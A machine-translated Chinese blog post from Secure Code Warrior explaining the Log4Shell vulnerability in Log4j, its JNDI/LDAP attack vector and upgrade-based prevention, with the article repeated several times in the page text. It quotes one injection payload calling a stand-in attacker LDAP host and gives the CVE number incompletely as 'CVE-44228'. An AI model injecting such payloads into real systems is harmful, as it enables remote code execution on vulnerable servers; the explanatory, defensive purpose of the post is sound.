博客

解释Log4j漏洞--它的攻击媒介和如何防止它的发生

Laura Verheyde
2022年1月16日出版

12月9日,Java库Log4j的一个0日漏洞被披露。CVE-44228被称为Log4Shell,由于该漏洞可导致远程代码执行(RCE),因此获得了 "高严重性 "评级。此外,log4j-core是正在使用的最常见的Java日志库之一,因此它使数百万的应用程序处于危险之中。

想快速提高你处理Log4Shell的技能吗? 

我们建立了一个展示平台,让你从Log4Shell的基本概念到在一个叫做Mission的模拟器中体验这个漏洞的利用。在这个任务中,我们将引导你了解Log4j漏洞如何影响你的基础设施和应用程序。点击这里直接跳到展示区,或者继续阅读以了解更多关于该漏洞的细节。

旧闻?

这个漏洞并不新鲜。安全研究人员Alvaro Muñoz和Oleksandr Mirosh在他们2016年的BlackHat演讲中已经强调,"应用程序不应该使用不受信任的数据进行JNDI查询",并说明了一个有针对性的JNDI/LDAP注入如何导致远程代码执行。而这正是Log4Shell的核心所在。

攻击矢量

Log4Shell的注入有效载荷看起来像这样。

${jndi:ldap://attacker.host/xyz}

To understand this we need to know about Java’s Expression Language (EL). Expressions written in the following syntax: ${expr} will be evaluated at runtime. For example, ${java:version} will return the Java version being used.

接下来是JNDI,即Java命名和目录接口,它是一个API,允许与使用LDAP、DNS、RMI等协议的服务连接,以检索数据或资源。简单地说,在我们上面的恶意有效载荷例子中,JNDI对攻击者控制的LDAP服务器进行查询。例如,它的响应可能指向一个包含恶意代码的Java类文件,而这个文件将在易受攻击的服务器上被执行。

这个漏洞之所以有问题,是因为Log4j会评估所有的日志条目,它会对所有用EL语法编写的、以 "jndi "为前缀的日志用户输入进行查找。有效载荷可以被注入到用户可以输入数据的任何地方,如表单字段。此外,HTTP头信息,如User-AgentX-Forwarded-For,以及其他头信息,都可以被定制来携带有效载荷。

要想亲自体验这个漏洞,请到我们的展示区,跳到第二步--"体验影响"

预防。认识

升级是所有应用程序的建议行动,因为Log4j一直在修补有漏洞的代码。然而,2.15.0和2.16.0版本包含一个DDoS和其他漏洞,这意味着从12月下旬开始,建议升级到2.17.0。

作为编写代码的开发者,我们需要随时考虑到安全问题。Log4Shell告诉我们,在使用第三方框架或库时存在风险。我们需要意识到一个事实,即我们的应用程序的安全性可能会因为使用外部资源而受到影响,我们天真地认为这些资源是安全的。 

这个漏洞是否可以被预防?是的,也不是。一方面,开发人员只能做这么多,因为脆弱的组件是通过第三方软件引入的。另一方面,从这一事件中得到的教训是一个被反复强调的教训,即永远不要相信用户输入。

Secure Code Warrior ,相信有安全意识的开发人员是防止代码中出现漏洞的最佳途径。由于SCW提供了针对编程框架的规模化培训,企业客户通过利用报告数据,迅速找到了谁是受影响的Java开发人员。他们还依靠他们经过SCW培训的安全冠军来加速升级Log4j。

特别是对于Java开发者,Secure Code Warrior ,提供Sensei ,一个免费的IntelliJ插件。这个基于规则的代码分析工具可以用来执行编码准则,并防止和补救漏洞。你可以创建你自己的规则,或者使用我们现成的食谱。浏览我们的食谱,别忘了下载我们的Log4j食谱,它将帮助你在眨眼间定位并修复Log4Shell漏洞。

提高你防御Log4Shell的技能

有兴趣将你在这篇博文中学到的东西付诸实践吗?我们的展示会可以帮助你。在展示会的开始,你将快速回顾这个漏洞,然后你将被带到一个模拟的环境,在那里你可以在指导下尝试利用这个漏洞。


查看资源
查看资源

2021年12月,Java库Log4j中的一个关键安全漏洞Log4Shell被披露。在这篇文章中,我们将Log4Shell漏洞分解成最简单的形式,让你掌握基本情况,并向你介绍一个任务--一个你可以尝试用这个漏洞的知识来利用一个模拟网站的游乐场。

想了解更多信息?

Secure Code Warrior 我们在这里为您的组织提供服务,帮助您在整个软件开发生命周期中确保代码安全,并创造一种将网络安全放在首位的文化。无论您是应用安全经理、开发人员、CISO或任何涉及安全的人,我们都可以帮助您的组织减少与不安全代码有关的风险。

预定一个演示
分享到
作者
Laura Verheyde
2022年1月16日出版

Laura Verheyde 是Secure Code Warrior 的一名软件开发人员,主要负责研究漏洞并为Missions 和编码实验室创建内容。

分享到

12月9日,Java库Log4j的一个0日漏洞被披露。CVE-44228被称为Log4Shell,由于该漏洞可导致远程代码执行(RCE),因此获得了 "高严重性 "评级。此外,log4j-core是正在使用的最常见的Java日志库之一,因此它使数百万的应用程序处于危险之中。

想快速提高你处理Log4Shell的技能吗? 

我们建立了一个展示平台,让你从Log4Shell的基本概念到在一个叫做Mission的模拟器中体验这个漏洞的利用。在这个任务中,我们将引导你了解Log4j漏洞如何影响你的基础设施和应用程序。点击这里直接跳到展示区,或者继续阅读以了解更多关于该漏洞的细节。

旧闻?

这个漏洞并不新鲜。安全研究人员Alvaro Muñoz和Oleksandr Mirosh在他们2016年的BlackHat演讲中已经强调,"应用程序不应该使用不受信任的数据进行JNDI查询",并说明了一个有针对性的JNDI/LDAP注入如何导致远程代码执行。而这正是Log4Shell的核心所在。

攻击矢量

Log4Shell的注入有效载荷看起来像这样。

${jndi:ldap://attacker.host/xyz}

To understand this we need to know about Java’s Expression Language (EL). Expressions written in the following syntax: ${expr} will be evaluated at runtime. For example, ${java:version} will return the Java version being used.

接下来是JNDI,即Java命名和目录接口,它是一个API,允许与使用LDAP、DNS、RMI等协议的服务连接,以检索数据或资源。简单地说,在我们上面的恶意有效载荷例子中,JNDI对攻击者控制的LDAP服务器进行查询。例如,它的响应可能指向一个包含恶意代码的Java类文件,而这个文件将在易受攻击的服务器上被执行。

这个漏洞之所以有问题,是因为Log4j会评估所有的日志条目,它会对所有用EL语法编写的、以 "jndi "为前缀的日志用户输入进行查找。有效载荷可以被注入到用户可以输入数据的任何地方,如表单字段。此外,HTTP头信息,如User-AgentX-Forwarded-For,以及其他头信息,都可以被定制来携带有效载荷。

要想亲自体验这个漏洞,请到我们的展示区,跳到第二步--"体验影响"

预防。认识

升级是所有应用程序的建议行动,因为Log4j一直在修补有漏洞的代码。然而,2.15.0和2.16.0版本包含一个DDoS和其他漏洞,这意味着从12月下旬开始,建议升级到2.17.0。

作为编写代码的开发者,我们需要随时考虑到安全问题。Log4Shell告诉我们,在使用第三方框架或库时存在风险。我们需要意识到一个事实,即我们的应用程序的安全性可能会因为使用外部资源而受到影响,我们天真地认为这些资源是安全的。 

这个漏洞是否可以被预防?是的,也不是。一方面,开发人员只能做这么多,因为脆弱的组件是通过第三方软件引入的。另一方面,从这一事件中得到的教训是一个被反复强调的教训,即永远不要相信用户输入。

Secure Code Warrior ,相信有安全意识的开发人员是防止代码中出现漏洞的最佳途径。由于SCW提供了针对编程框架的规模化培训,企业客户通过利用报告数据,迅速找到了谁是受影响的Java开发人员。他们还依靠他们经过SCW培训的安全冠军来加速升级Log4j。

特别是对于Java开发者,Secure Code Warrior ,提供Sensei ,一个免费的IntelliJ插件。这个基于规则的代码分析工具可以用来执行编码准则,并防止和补救漏洞。你可以创建你自己的规则,或者使用我们现成的食谱。浏览我们的食谱,别忘了下载我们的Log4j食谱,它将帮助你在眨眼间定位并修复Log4Shell漏洞。

提高你防御Log4Shell的技能

有兴趣将你在这篇博文中学到的东西付诸实践吗?我们的展示会可以帮助你。在展示会的开始,你将快速回顾这个漏洞,然后你将被带到一个模拟的环境,在那里你可以在指导下尝试利用这个漏洞。


查看资源
查看资源

请填写下表下载报告

我们希望得到您的许可,向您发送有关我们产品和/或相关安全编码主题的信息。我们将始终以最谨慎的态度对待您的个人资料,绝不会将其出售给其他公司用于营销目的。

提交
要提交表格,请启用 "分析 "cookies。完成后,请随时再次禁用它们。

12月9日,Java库Log4j的一个0日漏洞被披露。CVE-44228被称为Log4Shell,由于该漏洞可导致远程代码执行(RCE),因此获得了 "高严重性 "评级。此外,log4j-core是正在使用的最常见的Java日志库之一,因此它使数百万的应用程序处于危险之中。

想快速提高你处理Log4Shell的技能吗? 

我们建立了一个展示平台,让你从Log4Shell的基本概念到在一个叫做Mission的模拟器中体验这个漏洞的利用。在这个任务中,我们将引导你了解Log4j漏洞如何影响你的基础设施和应用程序。点击这里直接跳到展示区,或者继续阅读以了解更多关于该漏洞的细节。

旧闻?

这个漏洞并不新鲜。安全研究人员Alvaro Muñoz和Oleksandr Mirosh在他们2016年的BlackHat演讲中已经强调,"应用程序不应该使用不受信任的数据进行JNDI查询",并说明了一个有针对性的JNDI/LDAP注入如何导致远程代码执行。而这正是Log4Shell的核心所在。

攻击矢量

Log4Shell的注入有效载荷看起来像这样。

${jndi:ldap://attacker.host/xyz}

To understand this we need to know about Java’s Expression Language (EL). Expressions written in the following syntax: ${expr} will be evaluated at runtime. For example, ${java:version} will return the Java version being used.

接下来是JNDI,即Java命名和目录接口,它是一个API,允许与使用LDAP、DNS、RMI等协议的服务连接,以检索数据或资源。简单地说,在我们上面的恶意有效载荷例子中,JNDI对攻击者控制的LDAP服务器进行查询。例如,它的响应可能指向一个包含恶意代码的Java类文件,而这个文件将在易受攻击的服务器上被执行。

这个漏洞之所以有问题,是因为Log4j会评估所有的日志条目,它会对所有用EL语法编写的、以 "jndi "为前缀的日志用户输入进行查找。有效载荷可以被注入到用户可以输入数据的任何地方,如表单字段。此外,HTTP头信息,如User-AgentX-Forwarded-For,以及其他头信息,都可以被定制来携带有效载荷。

要想亲自体验这个漏洞,请到我们的展示区,跳到第二步--"体验影响"

预防。认识

升级是所有应用程序的建议行动,因为Log4j一直在修补有漏洞的代码。然而,2.15.0和2.16.0版本包含一个DDoS和其他漏洞,这意味着从12月下旬开始,建议升级到2.17.0。

作为编写代码的开发者,我们需要随时考虑到安全问题。Log4Shell告诉我们,在使用第三方框架或库时存在风险。我们需要意识到一个事实,即我们的应用程序的安全性可能会因为使用外部资源而受到影响,我们天真地认为这些资源是安全的。 

这个漏洞是否可以被预防?是的,也不是。一方面,开发人员只能做这么多,因为脆弱的组件是通过第三方软件引入的。另一方面,从这一事件中得到的教训是一个被反复强调的教训,即永远不要相信用户输入。

Secure Code Warrior ,相信有安全意识的开发人员是防止代码中出现漏洞的最佳途径。由于SCW提供了针对编程框架的规模化培训,企业客户通过利用报告数据,迅速找到了谁是受影响的Java开发人员。他们还依靠他们经过SCW培训的安全冠军来加速升级Log4j。

特别是对于Java开发者,Secure Code Warrior ,提供Sensei ,一个免费的IntelliJ插件。这个基于规则的代码分析工具可以用来执行编码准则,并防止和补救漏洞。你可以创建你自己的规则,或者使用我们现成的食谱。浏览我们的食谱,别忘了下载我们的Log4j食谱,它将帮助你在眨眼间定位并修复Log4Shell漏洞。

提高你防御Log4Shell的技能

有兴趣将你在这篇博文中学到的东西付诸实践吗?我们的展示会可以帮助你。在展示会的开始,你将快速回顾这个漏洞,然后你将被带到一个模拟的环境,在那里你可以在指导下尝试利用这个漏洞。


开始吧

点击下面的链接,下载本资料的 PDF 文件。

Secure Code Warrior 我们在这里为您的组织提供服务,帮助您在整个软件开发生命周期中确保代码安全,并创造一种将网络安全放在首位的文化。无论您是应用安全经理、开发人员、CISO或任何涉及安全的人,我们都可以帮助您的组织减少与不安全代码有关的风险。

查看报告预定一个演示
查看资源
分享到
想了解更多信息?

分享到
作者
Laura Verheyde
2022年1月16日出版

Laura Verheyde 是Secure Code Warrior 的一名软件开发人员,主要负责研究漏洞并为Missions 和编码实验室创建内容。

分享到

12月9日,Java库Log4j的一个0日漏洞被披露。CVE-44228被称为Log4Shell,由于该漏洞可导致远程代码执行(RCE),因此获得了 "高严重性 "评级。此外,log4j-core是正在使用的最常见的Java日志库之一,因此它使数百万的应用程序处于危险之中。

想快速提高你处理Log4Shell的技能吗? 

我们建立了一个展示平台,让你从Log4Shell的基本概念到在一个叫做Mission的模拟器中体验这个漏洞的利用。在这个任务中,我们将引导你了解Log4j漏洞如何影响你的基础设施和应用程序。点击这里直接跳到展示区,或者继续阅读以了解更多关于该漏洞的细节。

旧闻?

这个漏洞并不新鲜。安全研究人员Alvaro Muñoz和Oleksandr Mirosh在他们2016年的BlackHat演讲中已经强调,"应用程序不应该使用不受信任的数据进行JNDI查询",并说明了一个有针对性的JNDI/LDAP注入如何导致远程代码执行。而这正是Log4Shell的核心所在。

攻击矢量

Log4Shell的注入有效载荷看起来像这样。

${jndi:ldap://attacker.host/xyz}

To understand this we need to know about Java’s Expression Language (EL). Expressions written in the following syntax: ${expr} will be evaluated at runtime. For example, ${java:version} will return the Java version being used.

接下来是JNDI,即Java命名和目录接口,它是一个API,允许与使用LDAP、DNS、RMI等协议的服务连接,以检索数据或资源。简单地说,在我们上面的恶意有效载荷例子中,JNDI对攻击者控制的LDAP服务器进行查询。例如,它的响应可能指向一个包含恶意代码的Java类文件,而这个文件将在易受攻击的服务器上被执行。

这个漏洞之所以有问题,是因为Log4j会评估所有的日志条目,它会对所有用EL语法编写的、以 "jndi "为前缀的日志用户输入进行查找。有效载荷可以被注入到用户可以输入数据的任何地方,如表单字段。此外,HTTP头信息,如User-AgentX-Forwarded-For,以及其他头信息,都可以被定制来携带有效载荷。

要想亲自体验这个漏洞,请到我们的展示区,跳到第二步--"体验影响"

预防。认识

升级是所有应用程序的建议行动,因为Log4j一直在修补有漏洞的代码。然而,2.15.0和2.16.0版本包含一个DDoS和其他漏洞,这意味着从12月下旬开始,建议升级到2.17.0。

作为编写代码的开发者,我们需要随时考虑到安全问题。Log4Shell告诉我们,在使用第三方框架或库时存在风险。我们需要意识到一个事实,即我们的应用程序的安全性可能会因为使用外部资源而受到影响,我们天真地认为这些资源是安全的。 

这个漏洞是否可以被预防?是的,也不是。一方面,开发人员只能做这么多,因为脆弱的组件是通过第三方软件引入的。另一方面,从这一事件中得到的教训是一个被反复强调的教训,即永远不要相信用户输入。

Secure Code Warrior ,相信有安全意识的开发人员是防止代码中出现漏洞的最佳途径。由于SCW提供了针对编程框架的规模化培训,企业客户通过利用报告数据,迅速找到了谁是受影响的Java开发人员。他们还依靠他们经过SCW培训的安全冠军来加速升级Log4j。

特别是对于Java开发者,Secure Code Warrior ,提供Sensei ,一个免费的IntelliJ插件。这个基于规则的代码分析工具可以用来执行编码准则,并防止和补救漏洞。你可以创建你自己的规则,或者使用我们现成的食谱。浏览我们的食谱,别忘了下载我们的Log4j食谱,它将帮助你在眨眼间定位并修复Log4Shell漏洞。

提高你防御Log4Shell的技能

有兴趣将你在这篇博文中学到的东西付诸实践吗?我们的展示会可以帮助你。在展示会的开始,你将快速回顾这个漏洞,然后你将被带到一个模拟的环境,在那里你可以在指导下尝试利用这个漏洞。


目录

下载PDF
查看资源
想了解更多信息?

Secure Code Warrior 我们在这里为您的组织提供服务,帮助您在整个软件开发生命周期中确保代码安全,并创造一种将网络安全放在首位的文化。无论您是应用安全经理、开发人员、CISO或任何涉及安全的人,我们都可以帮助您的组织减少与不安全代码有关的风险。

预定一个演示下载
分享到
资源中心
资源中心